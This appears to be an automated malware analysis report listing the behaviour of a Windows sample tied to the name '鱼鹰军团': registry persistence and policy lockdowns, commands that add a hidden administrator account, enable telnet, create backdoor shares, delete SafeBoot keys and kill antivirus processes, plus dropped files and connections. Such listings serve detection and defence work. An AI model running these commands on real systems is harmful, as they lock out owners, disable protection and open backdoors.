Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '<File name>.exe' = '<Full path to file>'
- [<HKLM>\SOFTWARE\Classes\EKY_CLASSES_ROOT\exefile\shell\open\command] '' = '<Full path to file>'
- [<HKLM>\SOFTWARE\Classes\.bat] '' = 'jpegfile'
- [<HKLM>\SOFTWARE\Classes\.exe] '' = 'jpegfile'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run] 'ADSL Dial' = '<Full path to file>'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '工具.exe' = '【鱼鹰军团】ZHX.exe' (GBK names; shown mis-encoded on the original page as '№¤ѕЯ.exe' = 'ЎѕУгУҐѕь¶УЎїZHX.exe')
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '工具.exe' = 'C:\Users\Administrator\Desktop\【鱼鹰军团】ZHX.exe' (GBK names; shown mis-encoded on the original page as '№¤ѕЯ.exe' = 'C:\Users\Administrator\Desktop\ЎѕУгУҐѕь¶УЎїZHX.exe')
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] '我的启动项' = '<Full path to file>' (GBK name; shown mis-encoded on the original page as 'ОТµДЖф¶ЇПо')
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] '【鱼鹰军团】ZHX.exe' = '<Full path to file>' (GBK name; shown mis-encoded on the original page as 'ЎѕУгУҐѕь¶УЎїZHX.exe')
- hidden files
- Command Prompt (CMD)
- Windows Task Manager (Taskmgr)
- Registry Editor (RegEdit)
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoLogOff' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFileMenu' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFind' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetFolders' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewContextMenu' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRecentDocsMenu' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoClose' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDrives' = 'FFFFFFFF'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRun' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoControlPanel' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDesktop' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewOnDrive' = 'FFFFFFFF'
- '<SYSTEM32>\net1.exe' user Forbidden /active:yes
- '<SYSTEM32>\net.exe' user Forbidden /active:yes
- '<SYSTEM32>\net1.exe' start Server
- '<SYSTEM32>\net.exe' localgroup Administrators Forbidden /add
- '<SYSTEM32>\net.exe' user Administrator /active:no
- '<SYSTEM32>\net1.exe' localgroup Administrators Forbidden /add
- '<SYSTEM32>\net1.exe' user 【鱼鹰军团】 969675 /add (GBK account name; shown mis-encoded on the original page as 'ЎѕУгУҐѕь¶УЎї')
- '<SYSTEM32>\net1.exe' start telnet
- '<SYSTEM32>\net.exe' start telnet
- '<SYSTEM32>\net.exe' share houmen2$=d:\
- '<SYSTEM32>\net.exe' share houmen$=c:\
- '<SYSTEM32>\net1.exe' share houmen2$=d:\
- '<SYSTEM32>\net.exe' user 【鱼鹰军团】 969675 /add (GBK account name; shown mis-encoded on the original page as 'ЎѕУгУҐѕь¶УЎї')
- '<SYSTEM32>\net1.exe' share houmen$=c:\
- '<SYSTEM32>\net.exe' start Server
- '<SYSTEM32>\cmd.exe' /k net logoff -set loadoptions DDISABLE_INTEGRITY_CHECKS
- '<SYSTEM32>\net.exe' password
- '<SYSTEM32>\net1.exe' user guest 5197
- '<SYSTEM32>\net1.exe' password
- '<SYSTEM32>\net1.exe' logoff -set loadoptions DDISABLE_INTEGRITY_CHECKS
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\ /va /f
- '<SYSTEM32>\net.exe' logoff -set loadoptions DDISABLE_INTEGRITY_CHECKS
- '<SYSTEM32>\net1.exe' share c$ /del
- '<SYSTEM32>\iexpress.exe'
- '<SYSTEM32>\syskey.exe'
- '<SYSTEM32>\net1.exe' user Administrator /active:no
- '<SYSTEM32>\net.exe' share c$ /del
- '<SYSTEM32>\net.exe' user guest 5197
- '<SYSTEM32>\net1.exe' stop
- '<SYSTEM32>\net.exe' stop
- '<SYSTEM32>\taskkill.exe' /f /im ZhuDongFangYu.exe
- '<SYSTEM32>\charmap.exe'
- '<SYSTEM32>\utilman.exe'
- '<SYSTEM32>\shrpubw.exe'
- '<SYSTEM32>\sndrec32.exe'
- '<SYSTEM32>\packager.exe'
- '<SYSTEM32>\cliconfg.exe'
- '<SYSTEM32>\sigverif.exe'
- '<SYSTEM32>\taskkill.exe' /f /im VsTskMgr.exe
- '<SYSTEM32>\taskkill.exe' /f /im kavsvc.exe
- '<SYSTEM32>\shutdown.exe' -s -t 3600
- '<SYSTEM32>\mstsc.exe' /v: 192.168.1.103:3389 /console
- '<SYSTEM32>\taskkill.exe' /f /im KVXP.kxp
- '<SYSTEM32>\taskkill.exe' /f /im Mcshield.exe
- '<SYSTEM32>\taskkill.exe' /f /im Ravmon.exe
- '<SYSTEM32>\taskkill.exe' /f /im Rav.exe
- '<SYSTEM32>\taskkill.exe' /f /im 360sclog.exe
- '<SYSTEM32>\taskkill.exe' /f /im 360tray.exe
- '<SYSTEM32>\net.exe' stop messenger
- '<SYSTEM32>\net1.exe' stop messenger
- '<SYSTEM32>\taskkill.exe' /f /im 360se.exe
- '<SYSTEM32>\taskkill.exe' /f /im 360sctblist.exe
- '<SYSTEM32>\taskkill.exe' /f /im 360realpro.exe
- '<SYSTEM32>\wscript.exe'
- '<SYSTEM32>\narrator.exe'
- '<SYSTEM32>\netstat.exe' -an （tc） (GBK full-width parentheses; shown mis-encoded on the original page as 'ЈЁtcЈ©')
- '<SYSTEM32>\netstat.exe' -an
- '<SYSTEM32>\ntbackup.exe'
- '<SYSTEM32>\ddeshare.exe'
- '<SYSTEM32>\mstsc.exe'
- '<SYSTEM32>\nslookup.exe'
- 360tray.exe
- <SYSTEM32>\dllcache\taskmgr.exe.new
- <SYSTEM32>\NtmsData\NTMSDATA
- <SYSTEM32>\taskmgr.exe.new
- %APPDATA%\Microsoft\Speech\Files\UserLexicons\SP_E0EEF5A6305B4FE9893AC119D6043D53.dat
- <SYSTEM32>\NtmsData\NTMSREG
- <SYSTEM32>\NtmsData\NTMSJRNL
- <SYSTEM32>\NtmsData\NTMSIDX
- <SYSTEM32>\NtmsData\NTMSDATA.BAK
- C:\Documents and Settings\<File name>.exe
- <Current directory>\YUYING.bat
- <Current directory>\Fontainebleau.bat
- <Current directory>\Crash.vbs
- <Current directory>\Osprey.bat
- %WINDIR%\<File name>.exe
- %ProgramFiles%\<File name>.exe
- <SYSTEM32>\Eleanor.ico
- <SYSTEM32>\2.bat
- <SYSTEM32>\NtmsData\NTMSJRNL
- <SYSTEM32>\taskmgr.exe
- <SYSTEM32>\NtmsData\NTMSJRNL
- '<L####NET_GATEWAY>':53
- '<L####NET>.1.103':3389
- ClassName: 'NDDEAgnt' WindowName: 'NetDDE Agent'
- ClassName: 'OleMainThreadWndClass' WindowName: ''
- ClassName: 'CicLoaderWndClass' WindowName: ''
- ClassName: 'MSAA_DA_Class' WindowName: 'MSAA_DA_d48'
- ClassName: 'EDIT' WindowName: ''
- ClassName: '' WindowName: 'Windows Script Host Settings'
- ClassName: 'Progman' WindowName: ''
- ClassName: '' WindowName: 'Microsoft Internet Explorer'
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: '' WindowName: 'File Signature Verification'
- ClassName: '#32770' WindowName: 'Utility Manager'
- ClassName: '' WindowName: ''